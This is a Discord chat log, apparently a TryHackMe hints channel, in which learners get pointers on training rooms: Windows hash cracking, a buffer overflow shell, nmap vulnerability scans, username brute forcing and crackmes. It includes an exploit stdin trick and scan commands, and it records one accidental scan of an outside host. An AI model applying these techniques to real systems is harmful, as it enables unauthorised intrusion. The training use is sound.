@white salmon i think i've got it lol... this pattern was pretty obvious, but what to do with it... that's the trick

@white salmon i think i've got it lol... this pattern was pretty obvious, but what to do with it... that's the trick
@mint parcel play with it now then

Think of each lowercaseUppercase as a pair

Best hint I can give

@keen willow gave a good hint too up in the chat 😄

Good luck all

Hope you're enjoying it

Oooo room maker giving out hints 👀👀

Yeet

No hints unless room maker says it ok

I'd like a hint on the Blue room Task 4: Cracking. I'm curious what in the pw hash would specify it as a particular hash format. I went to md5hashing.net and used all and it found none. I was stepping thru each one. I deleted the Jon part of it, but now... ?

Context

You got it from Windows, windows passwords are hashes using a specific algorithm

It seems to me that Admin:500 is a user and id#. So Guest:501 and Jon:1000 are as well. So the hash begins with the : or after?

The hashes are all the hex

I searched for windows hashing algorithm and it says md4

It's not MD4

It's based on MD4

oh...goody

But it's not MD4

ok

ty

There's two of them, one of the hashes is normally blank though

the : is the separator for different fields in the hash dump

windows hashing algorithm into google

Will give you the answers

Could need a hint for the ||bof|| part on Anonymous. Got the bof working, but the ||setuid|| to id ||1337|| doesn't work, because the partition is mounted with ||nosuid||
So I got no permission 🤔

I guess you gotta keep the shell alive

||with (cat payload.txt; cat) | ./binary||

Tried it, doesn't work for me.
strace output line: ||setuid(1337) = -1 EPERM (Operation not permitted)||
the ||suid|| of the binary is dropped at the start : /

Another ||migitation I had to use was not to use the address of start of the function but the next address in the function. Idk why it worked but it did, probably because of bad characters.|| Someone smarter then can tell why it works.

@mint parcel Can you see a pattern in both the strings , ||lowercaseUppercaselowercaseUppercase................. ||
@white salmon both the strings

@white salmon both the strings
@keen willow ||string1::string2||

Hello, I am new to TryHackMe. I am at Task3 #6. DarkStar7471 has a video that shows the answers but I can't get the nmap vulnerability scripts to work properly. vulscan not at all, vulners I get some output but nothing that would give me the answer, vuln doesnt give me the output it does in the video even with the same input.

I am not sure what I am doing wrong. If someone wouldn't mind helping I would greatly appreciate it.

Task 3 #6 Nmap

Screenshots?

Sure, one moment

@keen willow pattern is co0l.. Got it!!!

vunlscan

I am at Task3 #6 So this is kind of vague

There's lots of rooms

And many of those have a task 3 question 6

Task 3 #6 Nmap
@real rock

Just do a general vuln scan

Thats what I get with vuln

I typed it letter for letter as DarkStar does but our outputs differ

Why did you put rpnmap.nmap there?

Thats what he does.... to output it to a file that can be reference later

Ill do it again with that portion

without*

But there's nothing telling nmap to put it into a file there, that's the issue

Ohhhhhh

-oN

Maybe thats why it isnt working

hi all.. if I have a salt and a hash... how do i use john to bruteforce with a dict? Do i need to combine the salt and hash into one file? How do I know which format to use?

I know for a fact you can find that answer on google

yea i've been looking and tried what I found but got no joy with JTR

@oblique shuttle https://github.com/magnumripper/JohnTheRipper/issues/2125

So I can trying to troubleshoot it still... I am noticing differences trying a verbose scan to see if I can see more on what might be going wrong?

I can't work out why that ends in a question mark. What's the question?

Lol syntax is wrong

.

are you using kali @real rock?

kali VM

yes

So I got this once...

oh god

You're scanning a box on the internet

Was I not supposed to?

Wee woo wee woo

You were meant to scan the machine that you deployed in the room

...

Police are coming to get you now

Better fry it all

lol be nice

I'm kidding lol

But yeah what Ninja said

...
@real rock Port scanning machines over the internet is still a grey area. If you make anything fall over from it, it's definitely illegal. This is why you need to be careful.

the -oN is important in that command @real rock, not having it changed the filename into a host name

it's a simple mistake to make, probably good that the file name wasn't fbi.gov though 🙂

Oh wait... did I scan an IP then send it to a IP address?

the scan data*

no, what you did was tell nmap to scan 2 hosts

Oh wait... did I scan an IP then send it to a IP address?
@real rock No, you scanned

the one you wanted, 10.10.X.Y and the one that James just highlighted

Gotcha

I see now

Wow... I guess you all know Im a noob now

leaving out the -oN meant nmap assumed everything at the end was a target

we were all noobs once

😆

but it's a good lesson to learn if you learn from it, parameters are important 🙂

Yes very true, some things just clicked

just now

have a look in /usr/share/nmap/scripts

ls

oops

all the scripts that nmap can use are in there

so the --script is telling nmap to run a selection of these

So I need to use one of these by typing it in exactly?

after script

exactly, so if for example you wanted to run all the smb related scripts you could do --script smb-*

I'll give you a hint

It's a HTTP vuln and port 80

Gotcha... so when I ended up looking online and saw a script it was correct for that person but not my scripts... so in the future when I research I can use the script for syntax purposes but I might need to change where the script is pointing to based on my library?

so vuln worked for them but I noticed I dont have that in my scripts

no, not exactly, vuln is a little different, it runs all the scripts that have that keyword in them, like a wildcard

so the syntax is fine

oh ok

if you run the command like Dark did in the video you should get the same result

nmap -A -T5 -sV --script vuln -oN rpnmap.nmap 10.10.x.y

just don't leave any of it out till you understand all of it

Ok, now that I have been straightened out... 😛

Does it mean something if it gets stuck on NSE Timing: About 98.89% done; ETC 15:31 (0:00:01 remaining) indefinitely?

This was my first issue before I start changing things trying to get it to work

started*

The timer isn't always 100% accurate

I looked online and it says to press "d" for debugging mode but that really doesnt help

that usually means that one of the scripts that is running has gotten stuck waiting on a response or that something has broken/timed out somewhere - i've gotten it once or twice, usually it just means finding the 'bad' script and leaving it out

Ok

Nmap script scans take forever

well the 'd' would be how you find out what's stuck

but yeah, some scans can take longer than you think they will

Gotcha, so if I am concerned that its broken d will tell me where its at (presumably what is causing the hang up) and once I know I can do look up how to leave the "bad script" out then rerun.

Otherwise wait a bit cause it can take a while.

Thank you all for all the help I know I am spitting all kinds of questions out

just so - for most rooms here that are designed to work for hacking learning nmap will work fine given a little time

I never finished DarkStar's video to the end (was trying to do it myself) just now finished it and I see his scan didn't even give him back a report to answer the last question. He said sometimes that just happens. A little annoyed I couldn't do it myself though.

Thanks I will keep working at it to become more proficient with the tool.

I have no IT experience before a few months ago. There is still so much I dont know

Then I found this site about a week ago

TryHackMe is AMAZING!

that's the way @real rock, keep at it and it'll come, before you know it this stuff will be easy and you'll find the next layer of tricky things to get stuck into

hey lads

can someone help me with webappsec101 room?

I'm on task 4 atm, and stuck on this question

Don't ask to ask, feel free to formulate your question with info as a whole and just ask it

and somebody will answer you

The hint is to look at a git file containing a bunch of names, but I'm unsure how this would help me.

Use the list of names

To try and find users

Am I meant to brute force the site using all the names to find a user? Or is there some other way?

That are logged in

It gives you the methods that you should try using in the task itself

wdym?

If it tells you that brute forcing is a method, and the hint literally gives you a list of names

what do you think?

so I should try brute force it then?

alright, except how would I know which are logged in cause I would need to brute force the password to.

Well, when it says "logged on" it's a bit misleading

it's really just saying "what's another existing username that you can find on the server"

You have to use your own sleuthing and enumeration skills to see if you can find it.

ah, alright

Like I said, the task itself already gave you some methods on how to do it.

There's a writeup if you're not sure about the method exactly.

no not really, but I generally like to try before looking at writeups

Well, the task itself does give you the methods, although it's just not for the same desired result (you're not bruteforcing passwords, you're bruteforcing usernames)

but you have to figure out how to do that exactly

.

@sick sun #bot-commands

Cam anyone help with intro to x86-64 task 4 number 1 . I have analysed the binary and got the correct answers for other questions but this particular question keeps giving wrong answer

@trim haven

You got this? 😄

Oh goodness

Yeah sure

Cam anyone help with intro to x86-64 task 4 number 1 . I have analysed the binary and got the correct answers for other questions but this particular question keeps giving wrong answer
@thin sorrel what’s the question sorrry?

Solved it thanks

can anyone help me with networking task 1 6

Oh awesome

lol jabba sweating bullets

I used the decimal @trim haven

I was getting ready to @ you Bob

Why didnt hex work tho

I already knew the question without having to go look at what it asked haha

It just wants the answer in decimal

😩

Lol thanks @oblique cliff

Both are right. The room just wants decimal answers

Np

I also need help with the last task

Crackme 2

I have solved crackme 1

can anyone help me with networking task1 question 6

please

Place breakpoints and check out what it’s doing to your input @thin sorrel

No need to ask more than once @white salmon

ok cool ... soory

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
  @white salmon

sorry*

No worries

Can you answer those so I can help better?

Networking
task 1

question 6

What does the question say?

Network services?

Delete that

Don’t post answers

oups ... sorry i didn't want to spoil

Have you tried googling common home network address ranges?

the thing is the format for the answer don't match

Have you tried googling common home network address ranges?
@oblique cliff

of course i tried

Doesn’t match what?

It’s not right if it doesn’t match

the answer is supposed to be in 3characters. 3 characters. 1 char . 1char

And there are many numbers that can match that

You can either brute force it or you can research and try to find an answer that fits that format

hummmm if I'm allow to do that .. ok I'll try

Allowed to do what? You can google

Don’t brute force it. ~~ I guess you can but it’ll take awhile~~

brute force for the answer

Don’t brute force it. I guess you can but it’ll take awhile
@oblique cliff Cloudflare will kill you

😆

@oblique cliff how do i continue analysis after hitting a breakpoint

Edited 👀

The room tells you how to do that

You can also google r2 commands

Or use the ? Operator

To see how to use different commands

ok never mind ... any hint for a google research?

Have you tried googling common home network address ranges?
@oblique cliff

yes I did

You’ll find it eventually I believe in you

Try private IP address ranges

Or something along those lines

the 5th question already took the only possible answer for this format .... it's a C class address so we don't have so much choice ...

for a private range

Correct

that why I'm stuck on the 6th

😭

If the first/24 subnet is used up

What do you think the next one is?

/16?

No that changes the reserved network address length

is it possible to get help with "Help Bears" yet? it appears the room has been deleted now and it has been 5 days since it was released. If it is not possible to complete the room now (due to being deleted) I want to know how close I got to solving it

@agile whale sure what’s up

@white salmon on the same /24 what’s the next subnet after the first one is used up?

is it possible to get help with "Help Bears" yet? it appears the room has been deleted now and it has been 5 days since it was released. If it is not possible to complete the room now (due to being deleted) I want to know how close I got to solving it
@agile whale It's been made private, rather than deleted

do I need to worry about giving spoilers away with the room?

Not really IMO

Don't spoil for no reason, but you can say whatever

let me googling that ...i'm coming

@oblique cliff after adding break points and examining the variables i noticed it added s3*****d to the password

I'm lost from there

No it doesn’t

Put a password you know like aaaa and see what happens to it

Okay

Thanks

Sure thing

@stuck fractal OK. the first first 2 flags where easy, I decoded them , then got stuck on the last flag. after some google foo, I found out the bears where doing the rootme webclient (questions where identical, not even changed from messages French to English) but this event did not have a 25char flag, then after a day discarded that the first flags linked to the last flag, did stego on the room description found 2 more passwords, but the password I have left is one 8char long but the flag is 25char long. not sure where to use the flag. Have tried using the flag format to create 2 more passwords but it comes to about 22char which is still too short for the last flag, I kinda feel like I am just guessing ant that there is some info somewhere that I am missing

So, there's more to the text file than what you can see

James did everyone who did that room get the points removed?

Probably, as it was made private

I have opened then in hex editors and binwalk, there is nothing hidden for me, have even checked for ADS

Zero width

Hmmm i do get them

I have a tool link

I'll drop it out of context in #resources

The link has absolutely zero relation to the room

Don't worry

OK I'm fed up ... I can't find an answer for this question ... what did I miss?
I've been on this one question for 2 hours, I've finished everything else ... it's discouraging

You know what range it belongs to

And you know 192.168.0.0/24 only changes the last octet

There's 254 or so other address ranges there

ok ... ???

So

Find some

how to delete

.... never mind ... I still don't get it

if i change anything it will not be private anymore

False.

Look at RFC1918

..... coming ...................

James, I have just rechecked the files I have and do not see anything hidden in the text, no unprintable characters. I can't re-download the source files to double check them, but these are the ones I have, shouldn't I be able to see unprintable/zero width characters in a hex editor?